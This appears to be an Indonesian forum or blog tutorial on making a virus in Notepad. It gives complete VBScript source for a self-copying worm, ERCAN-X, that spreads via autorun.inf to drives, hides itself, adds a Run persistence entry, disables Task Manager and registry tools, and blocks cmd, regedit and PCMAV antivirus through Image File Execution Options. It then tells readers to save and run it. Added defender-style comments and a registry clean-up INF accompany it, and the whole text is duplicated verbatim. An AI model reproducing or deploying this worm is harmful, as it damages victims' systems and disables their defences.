virus note pad
VIRUS NOTEPAD ERCAN-X
' mari kita sekarang belajar bikin virus di notepad
'ok.sekarang kita mulai aja..
' pertama2 kita klik start>all program>Accessories>buka notepad dan sekarang tinggal copy-paste aja.key (hehehehehe)
' Analysis notes (defender's view). This listing is a self-copying VBScript. In order, the
' visible statements:
'   1. read the running script's own text into `rekur`;
'   2. write that text into the Windows folder and into drive roots, next to an autorun.inf;
'   3. write a series of registry values under HKCU and HKLM;
'   4. repeat the whole pass after a pause unless the script was started from a type-1 drive.
' Artefacts to look for: 3rc4n-x.dll.vbs in the Windows folder; 3rc4nms32.dll.vbs and
' autorun.inf in drive roots (all read-only + hidden + system); the registry values listed
' further down; a wscript.exe process running one of those .vbs files.
'
' Every runtime error is suppressed, so a failed file or registry operation is skipped silently.
on error resume next
' `nt` is declared here but not used anywhere in the visible listing.
dim rekur,windowpath,desades,fs,mf,isi,tf,ercan,nt,check,sd
' Body of the autorun.inf written later: a shellexecute entry that starts wscript.exe on the
' dropped copy. NOTE(review): current Windows versions are understood to ignore autorun.inf
' launch entries on USB storage by default -- confirm for the fleet in question.
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe 3rc4nms32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
' File object for the script that is currently running.
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
' `size` is read but not used anywhere in the visible listing.
size = mf.size
' Drive type of the drive the script was started from (FileSystemObject DriveType:
' 1 = removable, 2 = fixed). Read once; it is never updated inside the loop below.
check = mf.drive.drivetype
' Open the script's own file for reading (1 = ForReading, -2 = system default encoding).
set text = mf.openastextstream(1,-2)
' Collect the script's own source, line by line, each line terminated with CRLF.
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
' Main pass: file drops, then registry writes. The loop condition is at the bottom.
do
' Special folder 0 is the Windows folder.
Set windowpath = fs.getspecialfolder(0)
' If a copy already exists, reset its attributes to 32 (Archive only) so that it can be
' overwritten; on a first run getfile fails and the error is swallowed.
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs ")
tf.attributes = 32
' Arguments 2 and true land in CreateTextFile's overwrite and unicode parameters.
set tf = fs.createtextfile(windowpath & "\3rc4n-x.dll.vbs",2,true)
tf.write rekur
tf.close
' 39 = 1 + 2 + 4 + 32 = ReadOnly + Hidden + System + Archive.
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs")
tf.attributes = 39
' Walk every drive; act on removable (1) and fixed (2) drives except A:.
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
' Same reset / write / re-hide sequence for the copy in the drive root.
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\3rc4nms32.dll.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes = 39
' Replace any existing autorun.inf in the drive root with the text held in `isi`.
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
' Registry writes through WScript.Shell (the statements are run together on two physical
' lines in this listing). Values written:
'   HKCU ...\Internet Explorer\Main\Window Title                      -> marker string
'   HKCU ...\Policies\Explorer\Advanced\Hidden                        -> 2
'   HKCU ...\Policies\Explorer\NoFind, NoFolderOptions, NoRun, NoViewContextMenu -> 1
'   HKCU ...\Policies\System\DisableRegistryTools, DisableTaskMgr     -> 1
'   HKLM ...\CurrentVersion\Winlogon\LegalNoticeCaption, LegalNoticeText
'   HKLM ...\CurrentVersion\Run\Systemdir                             -> a .vbs path in the Windows folder
'   HKLM ...\Image File Execution Options\<name>\Debugger             -> notepad.exe, for each listed executable
' Detection: alert on script hosts (wscript.exe / cscript.exe) writing Debugger values under
' Image File Execution Options or values under the Policies\Explorer and Policies\System keys.
' The HKLM writes need administrative rights; without them they fail and are skipped.
set ercan = createobject("WScript.Shell")
ercan.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: -> ERCAN-X<- ::" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THE ERCAN-X" ercan.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","No reason for Panic" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- 3rc4n.dll.vbs" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe" ercan.regwrite 
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe" if check <> 1 then
' 200000 ms = 200 s pause, taken only when the script's own drive is not type 1 (the `if`
' sits at the end of the previous line).
Wscript.sleep 200000
end if
' `check` never changes, so a copy started from a non-removable drive repeats the pass
' indefinitely and rewrites files and registry values each time. Clean-up therefore has to
' end the wscript.exe process first, or the changes come back.
loop while check <> 1
' Reached only when the script was started from a type-1 (removable) drive: opens an
' Explorer window with the script file selected.
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama 3rc4nms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan ERCAN-X.VBS di komputer Anda.
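Jika Anda membuka aplikasi yang bernama cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, atau PCMAV-RTP.exe, maka yang akan terbuka adalah "Notepad", karena nilai Debugger di Image File Execution Options untuk nama-nama tersebut diarahkan ke notepad.exe.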
SEKARANG KITA BUAT ANTIVIRUSNYA :
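; Registry clean-up INF for the values written by the ERCAN-X script shown above.
; Apply it (right-click > Install runs [DefaultInstall]) only after the wscript.exe
; process running the script has been ended; while that process is alive its loop
; writes the same values again.
; Scope: registry values only. The dropped files are NOT removed by this INF:
;   3rc4n-x.dll.vbs in the Windows folder, and 3rc4nms32.dll.vbs plus autorun.inf in
;   drive roots (all set read-only + hidden + system). Remove those separately.
; The HKLM entries need administrative rights.
[Version]
Signature="$Chicago$"
Provider=Ercan

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
; Overwrites the window title the script set; flags value 0 writes a string (REG_SZ).
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"

[del]
; Policy values set by the script.
; Hidden was missing from the original list although the script writes it (value 2).
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced, Hidden
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
; Logon notice strings and the Run entry written by the script.
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
; Image File Execution Options: only the Debugger value is deleted; the per-executable
; subkeys themselves are left in place.
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger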
SELAMAT MENCOBA....!!!
sebelumnya ane minta maaf sebesarnya kpd yg mengajarkan klo saya menuliskan ini tanpa pengetahuan anda..
Tanpa berniat sok jago atau sok pinter, ane menuliskan ini bertujuan berbagi ilmu pengetahuan di bidang IT kpd yg lain..
Tapi ane juga butuh bantuan temen2 dan para senior ane di sini, karena ane juga masih oon dalam hal ini.
Mari kita sama sama belajar dan berbagi
thank's
' mari kita sekarang belajar bikin virus di notepad
'ok.sekarang kita mulai aja..
' pertama2 kita klik start>all program>Accessories>buka notepad dan sekarang tinggal copy-paste aja.key (hehehehehe)
' Analysis notes (defender's view). This listing is a self-copying VBScript. In order, the
' visible statements:
'   1. read the running script's own text into `rekur`;
'   2. write that text into the Windows folder and into drive roots, next to an autorun.inf;
'   3. write a series of registry values under HKCU and HKLM;
'   4. repeat the whole pass after a pause unless the script was started from a type-1 drive.
' Artefacts to look for: 3rc4n-x.dll.vbs in the Windows folder; 3rc4nms32.dll.vbs and
' autorun.inf in drive roots (all read-only + hidden + system); the registry values listed
' further down; a wscript.exe process running one of those .vbs files.
'
' Every runtime error is suppressed, so a failed file or registry operation is skipped silently.
on error resume next
' `nt` is declared here but not used anywhere in the visible listing.
dim rekur,windowpath,desades,fs,mf,isi,tf,ercan,nt,check,sd
' Body of the autorun.inf written later: a shellexecute entry that starts wscript.exe on the
' dropped copy. NOTE(review): current Windows versions are understood to ignore autorun.inf
' launch entries on USB storage by default -- confirm for the fleet in question.
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe 3rc4nms32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
' File object for the script that is currently running.
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
' `size` is read but not used anywhere in the visible listing.
size = mf.size
' Drive type of the drive the script was started from (FileSystemObject DriveType:
' 1 = removable, 2 = fixed). Read once; it is never updated inside the loop below.
check = mf.drive.drivetype
' Open the script's own file for reading (1 = ForReading, -2 = system default encoding).
set text = mf.openastextstream(1,-2)
' Collect the script's own source, line by line, each line terminated with CRLF.
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
' Main pass: file drops, then registry writes. The loop condition is at the bottom.
do
' Special folder 0 is the Windows folder.
Set windowpath = fs.getspecialfolder(0)
' If a copy already exists, reset its attributes to 32 (Archive only) so that it can be
' overwritten; on a first run getfile fails and the error is swallowed.
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs ")
tf.attributes = 32
' Arguments 2 and true land in CreateTextFile's overwrite and unicode parameters.
set tf = fs.createtextfile(windowpath & "\3rc4n-x.dll.vbs",2,true)
tf.write rekur
tf.close
' 39 = 1 + 2 + 4 + 32 = ReadOnly + Hidden + System + Archive.
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs")
tf.attributes = 39
' Walk every drive; act on removable (1) and fixed (2) drives except A:.
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
' Same reset / write / re-hide sequence for the copy in the drive root.
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\3rc4nms32.dll.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes = 39
' Replace any existing autorun.inf in the drive root with the text held in `isi`.
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
' Registry writes through WScript.Shell (the statements are run together on two physical
' lines in this listing). Values written:
'   HKCU ...\Internet Explorer\Main\Window Title                      -> marker string
'   HKCU ...\Policies\Explorer\Advanced\Hidden                        -> 2
'   HKCU ...\Policies\Explorer\NoFind, NoFolderOptions, NoRun, NoViewContextMenu -> 1
'   HKCU ...\Policies\System\DisableRegistryTools, DisableTaskMgr     -> 1
'   HKLM ...\CurrentVersion\Winlogon\LegalNoticeCaption, LegalNoticeText
'   HKLM ...\CurrentVersion\Run\Systemdir                             -> a .vbs path in the Windows folder
'   HKLM ...\Image File Execution Options\<name>\Debugger             -> notepad.exe, for each listed executable
' Detection: alert on script hosts (wscript.exe / cscript.exe) writing Debugger values under
' Image File Execution Options or values under the Policies\Explorer and Policies\System keys.
' The HKLM writes need administrative rights; without them they fail and are skipped.
set ercan = createobject("WScript.Shell")
ercan.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: -> ERCAN-X<- ::" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THE ERCAN-X" ercan.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","No reason for Panic" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- 3rc4n.dll.vbs" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe" ercan.regwrite 
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe" if check <> 1 then
' 200000 ms = 200 s pause, taken only when the script's own drive is not type 1 (the `if`
' sits at the end of the previous line).
Wscript.sleep 200000
end if
' `check` never changes, so a copy started from a non-removable drive repeats the pass
' indefinitely and rewrites files and registry values each time. Clean-up therefore has to
' end the wscript.exe process first, or the changes come back.
loop while check <> 1
' Reached only when the script was started from a type-1 (removable) drive: opens an
' Explorer window with the script file selected.
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama 3rc4nms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan ERCAN-X.VBS di komputer Anda.
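Jika Anda membuka aplikasi yang bernama cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, atau PCMAV-RTP.exe, maka yang akan terbuka adalah "Notepad", karena nilai Debugger di Image File Execution Options untuk nama-nama tersebut diarahkan ke notepad.exe.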
SEKARANG KITA BUAT ANTIVIRUSNYA :
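; Registry clean-up INF for the values written by the ERCAN-X script shown above.
; Apply it (right-click > Install runs [DefaultInstall]) only after the wscript.exe
; process running the script has been ended; while that process is alive its loop
; writes the same values again.
; Scope: registry values only. The dropped files are NOT removed by this INF:
;   3rc4n-x.dll.vbs in the Windows folder, and 3rc4nms32.dll.vbs plus autorun.inf in
;   drive roots (all set read-only + hidden + system). Remove those separately.
; The HKLM entries need administrative rights.
[Version]
Signature="$Chicago$"
Provider=Ercan

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
; Overwrites the window title the script set; flags value 0 writes a string (REG_SZ).
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"

[del]
; Policy values set by the script.
; Hidden was missing from the original list although the script writes it (value 2).
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced, Hidden
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
; Logon notice strings and the Run entry written by the script.
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
; Image File Execution Options: only the Debugger value is deleted; the per-executable
; subkeys themselves are left in place.
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger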
SELAMAT MENCOBA....!!!
sebelumnya ane minta maaf sebesarnya kpd yg mengajarkan klo saya menuliskan ini tanpa pengetahuan anda..
Tanpa berniat sok jago atau sok pinter, ane menuliskan ini bertujuan berbagi ilmu pengetahuan di bidang IT kpd yg lain..
Tapi ane juga butuh bantuan temen2 dan para senior ane di sini, karena ane juga masih oon dalam hal ini.
Mari kita sama sama belajar dan berbagi
thank's